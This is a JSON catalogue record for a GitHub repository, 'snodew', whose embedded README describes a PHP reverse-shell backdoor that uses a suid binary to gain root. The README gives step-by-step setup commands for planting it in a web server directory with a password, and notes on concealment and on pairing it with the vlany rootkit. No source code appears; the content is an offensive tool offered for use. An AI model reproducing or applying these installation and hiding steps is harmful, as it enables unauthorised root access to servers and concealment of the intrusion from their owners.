{"id":13825796,"url":"https://github.com/mempodippy/snodew","last_synced_at":"2025-04-23T14:31:46.354Z","repository":{"id":201869396,"uuid":"77249411","full_name":"mempodippy/snodew","owner":"mempodippy","description":"PHP root (suid) reverse shell","archived":false,"fork":false,"pushed_at":"2017-06-22T22:42:42.000Z","size":7,"stargazers_count":73,"open_issues_count":0,"forks_count":22,"subscribers_count":6,"default_branch":"master","last_synced_at":"2025-04-02T16:50:33.679Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mempodippy.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2016-12-23T20:36:27.000Z","updated_at":"2025-01-08T06:38:18.000Z","dependencies_parsed_at":null,"dependency_job_id":"83ed53c3-41a7-4d05-9bc8-85fb60c75b81","html_url":"https://github.com/mempodippy/snodew","commit_stats":null,"previous_names":["mempodippy/snodew"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mempodippy%2Fsnodew","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mempodippy%2Fsnodew/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mempodippy%2Fsnodew/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mempodippy%2Fsnodew/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mempodippy","download_url":"https://codeload.github.com/mempodippy/snodew/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","rep
ositories_count":250451813,"owners_count":21432906,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T09:01:27.256Z","updated_at":"2025-04-23T14:31:46.107Z","avatar_url":"https://github.com/mempodippy.png","language":"Shell","funding_links":[],"categories":["\u003ca id=\"01e6651181d405ecdcd92a452989e7e0\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"e9f97504fbd14c8bb4154bd0680e9e62\"\u003e\u003c/a\u003e反向代理"],"readme":"# snodew\n*snodew is a PHP reverse shell backdoor which uses a small suid binary to escalate privileges on connection*\u003c/br\u003e\u003c/br\u003esnodew is made mainly to work alongside [vlany](https://github.com/mempodippy/vlany) but can also be set up as a regular root backdoor\n\n## usage\n```\ngit clone https://github.com/mempodippy/snodew.git\ncd snodew/\n./setup.sh [install dir] [password] [hidden extended attribute] [magic gid]\n```\n\n### example usage for regular (non-vlany infected) systems\n```\ncd /tmp\ngit clone https://github.com/mempodippy/snodew.git\ncd snodew/\n./setup.sh /var/www/html/blog sexlovegod X 0 # 'X' and '0' since extended attribute doesn't really matter,\n                                             # and our suid binary will set our gid to 0\n```\n\u003cimg src=\"http://i.imgur.com/EA93M3g.png\"/\u003e\u003c/br\u003e\n*Result of successful setup*\n\n\u003cimg src=\"http://i.imgur.com/2MM3h45.png\"/\u003e\u003c/br\u003e\n*Result after following instructions given on our new page*\n\n## notes\n * requires a web service to be running on the box (along with php support for the service package)\n * 
sh process spawned from service user is visible, though this could be subverted by checking /proc/self/cmdline and hiding the process if it contains the hidden suid bin\n * if not being used alongside some kind of rootkit, everything you do is visible\n * it's only a reverse shell\n * when vlany is installed, simply su'ing to the service user won't allow them to see the files. vlany checks to see if an apache environment variable is also exported before giving access to the file, and does the same for nginx so that - by default - the file can only be accessed from a browser or from an owner shell\n  * exporting the apache environment variable that vlany checks, after su'ing to the service user will circumvent this\n * suid possibly disabled\n * not using 'exit' to exit the shell will leave the process spawned by the service in process lists (ps, top etc)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmempodippy%2Fsnodew","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmempodippy%2Fsnodew","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmempodippy%2Fsnodew/lists"}